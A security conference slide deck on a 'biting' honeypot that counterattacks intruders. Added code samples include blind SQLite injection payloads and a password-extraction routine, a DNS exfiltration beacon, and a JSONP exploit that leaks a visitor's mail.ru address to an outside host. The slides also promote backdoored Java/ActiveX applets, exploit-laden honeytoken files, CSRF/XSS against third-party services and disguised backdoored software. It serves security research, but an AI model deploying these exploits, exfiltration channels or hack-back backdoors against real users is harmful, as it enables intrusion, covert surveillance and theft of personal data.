Honeypot that can bite: reverse penetration
Alexey Sintsov @asintsov
#WHOAMI
• Senior Security Engineer at
• Writer at
• Ideology and co-organizer of
• Co-Founder of
ZeroNights
#DISCLAIMER
• This story is not connected to my EMPLOYER
• All LIVE data was collected from Q2 2011 – Q3 2012
• It was done only for research purposes.
• All data was shared with NOBODY.
• Thanks to Alexey Tyurin (@antyurin)
#WHAT IS IT ABOUT honeypot
• Attract the attacker's attention (to the honeypot)
• Get patterns and actions from the attacker's behaviour
Then the operator can understand what kind of attacker we have, what he can do in the future, etc. After that we can take some 'preventive' actions.
Example 1. A bot searches for a PHP LFI bug in PMA (phpMyAdmin). Defensive actions:
1) Do we have PMA?
2) Is our PMA installation accessible from the Internet?
3) Is the bug fixed?
// but we can get the same from an IDS...
Example 2. SQLi attempt, dumping hashes. Defensive actions:
1) What kind of SQLi did he try to exploit? Let's check our web apps for the same SQLi patterns.
2) Check the hashes in our databases: are they salted? Do we have hashes at all (or plain text)?
3) Check access to the tables: is it possible to get access using the 'web' account?
#WHAT IS IT ABOUT attackers
• Automated attackers like BOTs. Attack vectors: known patterns. Impact: infecting the host
• Scr3pt k1dd13s. Attack vectors: few patterns. Impact: deface / dump data / ??
• Motivated attackers. Attack vectors: many patterns. Impact: ??
// It is not that easy in the real world... // It is not about skills
#WHOIS THE ATTACKER WhiteHats?
#WHAT IS IT ABOUT classic...
IDS alert: SQLi attempt in some .php
Is it vulnerable?
What did the attacker do?
Log/traffic analysis
Source analysis / manual validation
Who is the attacker?
- Was he looking for something special? - Is he going to come back? - How should we be prepared?
Deploy the Incident Response Team
© InfoSecReactions by @windsheep_
#WHOIS THE ATTACKER Why?
I do not care, the main task is to fix the bug!
vs. It's interesting, I want to track him!
#WHOIS THE ATTACKER Who wants to know...
• Enterprise - Who is hunting us like that?
(oil sector / big R&D) It is always good to know who started this activity... because if it is just kids, it is one thing; if a government or competitors, it is another.
• Government
- Track cybercrimes - Track other governments... cyber war, blah-blah-blah... - etc.
#WHOIS THE ATTACKER IDS/Logs
• IP address - TOR / (chain of) proxies / botnet
• User-Agent - lol
We have sniffed and got nothing.....
#HONEYPOT What do I want?
• Fast result: attack or false positive?
• Is it a targeted attack, or just a scan from a botnet?
• Is it a professional or a kiddie?
• Decloaking the attacker
• Tracking the attacker
#Offensive
"The only real defense is active defense" © Mao Zedong
• Hack your enemy first (aggressive)
• Hack your enemy back (defensive)
#Offensive Not new...
AV/security companies - to take down a botnet: • Hacking the C&C • Hacking the chain of bots • Hacking the admin's workstation
© Andrzej Dereszowski, SIGNAL 11, CONFidence 2010
#Offensive We can do more... "Replay back" – answer with the same exploit back to the source:
• SSH brute-force attack - if the source has an SSH service, replay with the same login/password -- though the attacker may already have changed the password on the pwned box
• PHP/Perl/Ruby web attacks - if the source has an HTTP service, replay back with the same URI/payload
It works against BOTs, and will not work against a real attacker.
#Offensive WWW
• Is it (the attacker) HUMAN? • Is he using a well-known application (browser/plugins)? • Can we EXPLOIT it?
Classical ExploitPACK?
#Honeypot Skills? Bug → Vulnerability → Exploit → Attack
Can be found automatically
SHOULD be found during manual tests
SHOULD be executed by the attacker with a browser!
Attacker's level of skills: • Low • Medium • High! • Dangerous, we are doomed!!!11
#Honeypot Trap
• DIRBuster attack: give them /admin/admin.php. But what is the password?
// We can detect brute-force attacks...
• /admin/help.php?id=1 <-- SQL injection. Get the password for admin.php
• Log in with the stolen password to /admin/admin.php
• Attack complete!
#Honeypot Blind SQL Injection (SQLite)
'
- 500 error. This is a bug
'/**/AND/**/'1'/**/like'1'--
- 200. This is a vulnerability
'union/**/select(CASE/**/WHEN/**/sqlite_version()like'3.%'THEN/**/select(1)from(lololo)ELSE'BHEU13'END)
- 200/500. This is an exploit
Skill-O-Meter
Additional to the Skill-O-Meter:
• Filtered symbols, like 'space' • WAF with small 'holes' • etc., like CTF tasks or a hackquest...
#Honeypot Attack
'union/**/select(CASE/**/WHEN(select/**/password/**/from/**/users/**/where/**/user='admin'and/**/password/**/like/**/'a%')THEN/**/select(1)from(lololo)ELSE'BHEU13'END)
SQLite supports triggers...
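The trap described on the last three slides, written out as an added example (this is not the talk's PHP honeypot, which is not on the slides): a deliberately injectable SQLite-backed handler standing in for /admin/help.php?id=..., a "WAF" that blocks raw spaces so the attacker has to fall back to /**/ (the "filtered symbols" hole), a Skill-O-Meter that places every request at bug / vulnerability / exploit / attack from the shape of the payload, and the boolean-based blind extraction of the admin password that the attack step performs. The table names, the unquoted numeric id, the fake credential and the classification rules are assumptions made for this demonstration; the probes follow the slides' /**/-for-space style but are constructed here, not copied from the deck.

```python
import re
import sqlite3
from dataclasses import dataclass, field

# Skill-O-Meter stages in the order the slides use them.
NORMAL, BUG, VULNERABILITY, EXPLOIT, ATTACK = range(5)
STAGE_NAMES = ["normal", "bug", "vulnerability", "exploit", "attack"]


def build_honeypot_db() -> sqlite3.Connection:
    """In-memory SQLite with constructed sample data (the credential is fake)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE help(id INTEGER, text TEXT);
        INSERT INTO help VALUES (1, 'How to reset a password'), (2, 'Contact support');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'bheu13');
        """
    )
    return db


def classify(payload: str) -> int:
    """Place one id= value on the Skill-O-Meter from its SQL shape alone (assumed rules)."""
    p = payload.lower()
    if re.search(r"\b(users|password)\b", p):
        return ATTACK          # reaching for the credential table: malicious intent
    if "sqlite_version" in p or "sqlite_master" in p or "union" in p:
        return EXPLOIT         # DBMS fingerprinting / data retrieval primitive
    if re.search(r"\b(and|or|like)\b", p):
        return VULNERABILITY   # a boolean condition appended: confirming the bug
    if "'" in p or not p.isdigit():
        return BUG             # a stray quote: looking for the error page
    return NORMAL


@dataclass
class Honeypot:
    db: sqlite3.Connection = field(default_factory=build_honeypot_db)
    log: list = field(default_factory=list)   # (payload, http_status, stage) per request

    def handle(self, id_param: str):
        """GET /admin/help.php?id=<id_param> -> (http_status, rows)."""
        if " " in id_param:
            status, rows = 403, []           # the WAF 'hole': raw spaces blocked, /**/ is not
        else:
            # Deliberately injectable: the honeypot wants this bug to be found.
            sql = "SELECT text FROM help WHERE id=" + id_param
            try:
                rows, status = self.db.execute(sql).fetchall(), 200
            except sqlite3.Error:
                rows, status = [], 500       # the '500 error' stage on the slides
        stage = classify(id_param)
        self.log.append((id_param, status, stage))
        return status, rows

    def skill_o_meter(self) -> int:
        """Highest stage reached in this session."""
        return max((stage for _, _, stage in self.log), default=NORMAL)

    def intent(self) -> str:
        """A WhiteHat stops at vulnerability/exploit; reading users.password is an attack."""
        return "malicious" if self.skill_o_meter() >= ATTACK else "probing"


def steal_admin_password(hp: Honeypot, alphabet="abcdefghijklmnopqrstuvwxyz0123456789",
                         max_len=32) -> str:
    """The attack step: boolean-based blind extraction, prefix by prefix with LIKE 'xxx%'.

    Spaces are replaced by /**/ to pass the honeypot's WAF rule. LIKE is case-insensitive
    in SQLite, so the recovered value is case-folded.
    """
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            probe = ("1/**/AND/**/(SELECT/**/password/**/FROM/**/users/**/WHERE/**/"
                     f"username='admin')/**/LIKE/**/'{known + ch}%'")
            status, rows = hp.handle(probe)
            if status == 200 and rows:      # the help text came back: condition was true
                known += ch
                break
        else:
            break                           # no character extends the prefix: done
    return known
```

Every request is logged with its stage, so the operator can read off both the Skill-O-Meter (how far the visitor got) and intent (whether the visitor went on to read the credential table after confirming the bug), which is exactly the distinction between a WhiteHat who stops and an attacker who continues that the next slide draws.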
#Honeypot ...can bite!
• For each step we can get:
o Human/automated attack (Skill-O-Meter)
o The malicious intention of an attacker
§ A WhiteHat will finish after finding a SQLi vulnerability. He will not attempt to get access to a forbidden part (admin.php)!
• On each step we can bite...
o On the 'attack step' we can counterattack...
#Counterattack What can we do?
• Attack his browser/plugins
• 1day/0day exploits
• Social engineering • Evil Java applet/ActiveX (GUI for administration...) • Honeytokens
• Attack his environment using the browser • Third-party services (web mail/social networks/etc.) • Local environment (localhost/DSL router)
#Social Engineering Honeytokens
• PDF file with secret information (and with an exploit...)
• EXE file with a secret application (fat client for SCADA...)
• etc....
#Social Engineering Java/ActiveX
• Backdoor
• Backdoor
• Backdoor
• With some GUI.... 8))
#Backdoor...? No – "detective"
• Get jpg/txt/doc files from the FS
• Get config files (VPN)
• Get BSSIDs
• Get network/domain configuration
• Get a traceroute to us
• Get DNS to us
• Get a camera shot, mic recording
• etc...
#Let’s try an idea
#Target
• Reverse DNS channel • ipconfig • tracert • Domain name • Login name • …
• DO NOT COLLECT PERSONAL INFO • DO NOT GET ANY DATA FROM HDD • REMOTE CONTROL DISABLED
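The "reverse DNS channel" on this slide, as an added example (not the talk's applet, which is not published on the slides): the collected fields are packed into DNS labels under a zone whose authoritative server the honeypot operator runs, and the operator rebuilds them from that server's query log. The name is resolved by the attacker's configured resolver, so the log records that resolver's address even when the HTTP side of the honeypot only ever saw a proxy or a TOR exit; that is what "we got the configured DNS server address" in the conclusion refers to. The zone name, the label layout (data labels, then seq-total, then session, then zone), the session ID and the query-log line format are assumptions for this demonstration; the log lines in the usage are constructed.

```python
import base64
import json
import re
from collections import defaultdict

ZONE = "dns.honeypot.example"   # assumed zone; its authoritative server is ours
MAX_LABEL = 63                  # RFC 1035 limits
MAX_NAME = 253
CHUNK = 120                     # payload characters per query name (two labels)


def _b32(data: bytes) -> str:
    """Base32 survives case folding by resolvers; padding is dropped and restored later."""
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_beacon(session: str, fields: dict) -> list:
    """Pack the applet's findings into the names it would resolve, in order.

    Layout: <up to two 63-char data labels>.<seq>-<total>.<session>.ZONE
    """
    payload = _b32(json.dumps(fields, sort_keys=True, separators=(",", ":")).encode())
    chunks = [payload[i:i + CHUNK] for i in range(0, len(payload), CHUNK)]
    names = []
    for seq, chunk in enumerate(chunks):
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join(labels + [f"{seq}-{len(chunks)}", session, ZONE])
        if len(name) > MAX_NAME:
            raise ValueError("session id or zone too long for the chosen CHUNK size")
        names.append(name)
    return names


def decode_query(qname: str):
    """Split one query name into (session, seq, total, data) or None if it is not ours."""
    qname = qname.rstrip(".")
    if not qname.lower().endswith("." + ZONE):
        return None
    labels = qname[: -len(ZONE) - 1].split(".")
    if len(labels) < 3:
        return None
    *data_labels, seq_label, session = labels
    m = re.fullmatch(r"(\d+)-(\d+)", seq_label)
    if not m:
        return None
    return session.lower(), int(m.group(1)), int(m.group(2)), "".join(data_labels)


# Simplified query-log line (constructed format, not any particular server's):
#   <timestamp> client <ip>#<port>: query: <qname> IN <type>
LOG_RE = re.compile(r"client (?P<ip>[0-9a-fA-F.:]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")


def reassemble(log_lines) -> dict:
    """Rebuild beacons per session from the authoritative server's query log.

    Result: {session: {"resolvers": [ips that asked], "fields": dict or None if incomplete}}.
    The IPs are the attacker's configured resolvers (or their upstream), not the HTTP source.
    """
    parts = defaultdict(dict)
    totals = {}
    resolvers = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        parsed = decode_query(m.group("qname"))
        if parsed is None:
            continue                       # ordinary traffic or noise for our zone
        session, seq, total, data = parsed
        parts[session][seq] = data         # duplicates (resolver retries) simply overwrite
        totals[session] = total
        resolvers[session].add(m.group("ip"))
    result = {}
    for session, chunks in parts.items():
        fields = None
        if len(chunks) == totals[session]:
            try:
                fields = json.loads(_unb32("".join(chunks[i] for i in range(totals[session]))))
            except (ValueError, KeyError):
                fields = None              # corrupted or tampered beacon
        result[session] = {"resolvers": sorted(resolvers[session]), "fields": fields}
    return result
```

Queries arrive out of order and with the case of the labels possibly changed by an intermediate resolver, which is why the payload is base32 and each name carries its own sequence number; a session whose chunks never all arrive is reported with `fields` set to None rather than dropped, since the resolver address alone is already a result.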
#Results
GET requests log
It can be a web proxy or a TOR exit point...
Data from the attacker's PC
#Results
Real logins – surnames
Real hostnames and domains
Real ISPs, IP addresses
#Results
Write-up about the first DCG meeting in Russia...
habrahabr.ru <- the most technical Russian IT community...
Comments... "If someone wants an invite: ' or 1=1-- "
#Hello “Red May” 2011
GET requests log
#Unexpected
GET requests log
One beautiful ex-USSR republic... Nothing special...
Damn! The Special-Super-Secret-Service of a beautiful ex-USSR republic...
Looks like a 'service' username, not a personal one... maybe it was compromised?
#More drama
... a few hours later, another intrusion into the DCG web site... from the same ex-USSR republic, same city.... but another subnet... and again – "reverse penetration"
Known nickname; you can Google him as a known hacker from this ex-USSR republic... maybe he is working for this Secret Service... or compromised this host and uses it as an intermediate...
#Results
• WhiteHat companies – have tested our applet!
• Independent WhiteHat researchers...
• Backdoored government workstations....
• Script kiddies...
#Conclusion It works!
• We got real usernames of those who did not use VMware or middle hosts
• We got the real source for those who used VMware/TOR/proxy but did not use middle hosts
• We got intermediate hosts, but we can detect that, and got
• We got the configured DNS server address
• And we got it automatically...
The same results are possible with honeytoken/exploit-back techniques...
SE: the attacker is not expecting a back-attack!
#But Not all attackers are careless
// @ahack_ru knew about the honeypot and the Java applet and did not run it... but he was busted anyway!
#Can we attack 3rd-party services? If the user is authenticated on other services
(diagram: HoneyPot -> Attacker -> SocialNetwork)
• Attack begins
• CSRF/XSS attack...
• Callback with ID....
• Proxy/TOR/VPN – it is not about the network! • Works only vs. script kiddies and WhiteHats
#Yandex JSONP
#mail.ru JSONP
Hack 1: SSL
Hack 2: <iframe src=“data:…
By Egor Homakov
#mail.ru exploit

```javascript
// "Hack 2" from the previous slide: the JSONP loader runs inside a data: URI iframe.
// The inner closing tag is written as <\/script> so the HTML parser does not end the
// outer <script> element while this line is still being parsed.
document.write("<iframe src='data:text/html,<html><body><script>" +
  "var sss = document.createElement(\"script\");" +
  "sss.src = \"http://swa.mail.ru/cgi-bin/counters?JSONP_call=PortalHeadlineJSONPCallback&132417612\";" +
  "function PortalHeadlineJSONPCallback(objFromMail) {" +
  "  var arr1 = objFromMail[\"data\"];" +
  "  var i = new Image();" +                                  // leak the address via an image request
  "  i.src = \"http://defcon-russia.ru/counter.php?\" + arr1[\"email\"];" +
  "  document.body.appendChild(i);" +
  "};" +
  "document.body.appendChild(sss);" +
  "<\/script></body></html>'>");
```
#Let’s try an idea
#Results
#Conclusion It works!
• We got real e-mails
• We got real names
• We can correlate the two e-mail addresses and the Java applet response
• And we got it automatically...
#Conclusion Stats!
• SQLi attacks - 484 (~1.2 years)
• Applet strikes - 52 (~1.2 years)
• Mail grabs - 16 (6 months)
#Conclusion
Public announcements of DC Rus
First meeting
Second meeting
Sixth meeting announcement, pre-ZeroNights era
#Conclusion Everybody likes graphics =)
#Moarrrrrrrrr The local environment can be attacked!
• Anti DNS pinning / DNS rebinding
• XXXSS by Samy Kamkar (getting BSSIDs...)
• CSRF/XSS on any local resources....
• There can be a million techniques and tricks for that...
#Moarrrrrrrrr More techniques and tricks...
OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK, PaulDotCom
#SE – Custom software Anti-CyberCrime
#SE – Custom software Anti-Cybercrime
(diagram) Login -> Detect fraud/hack attempt; normal user: Classic ActiveX/Java -> Work...; detected attacker: Backdoored ActiveX/Java -> Error/Maintenance
#SE – Custom software Government level
• SCADA
• Army systems • FSB/KGB/CIA/MI6/...
• etc..
#SE – Custom software Soviet software?
#SE – Custom software Soviet software?
• Yes, the same OS, hardware...
• But different client-server software...
#SE – Custom software How can it be done?
• Fake vendor WWW/software (SMART GRID)
• An interesting (for an attacker) honeypot host that has a service for this software
• + Java/ActiveX tricks...
#SE – Custom software Anti-RE
• Hide the code with intelligence purposes
• Make your code non-suspicious
• Add real functionality....
#Conclusion
• Counterattack can work...
• WhiteHats are LESS careful when testing something...
• ????
• Moral/Legal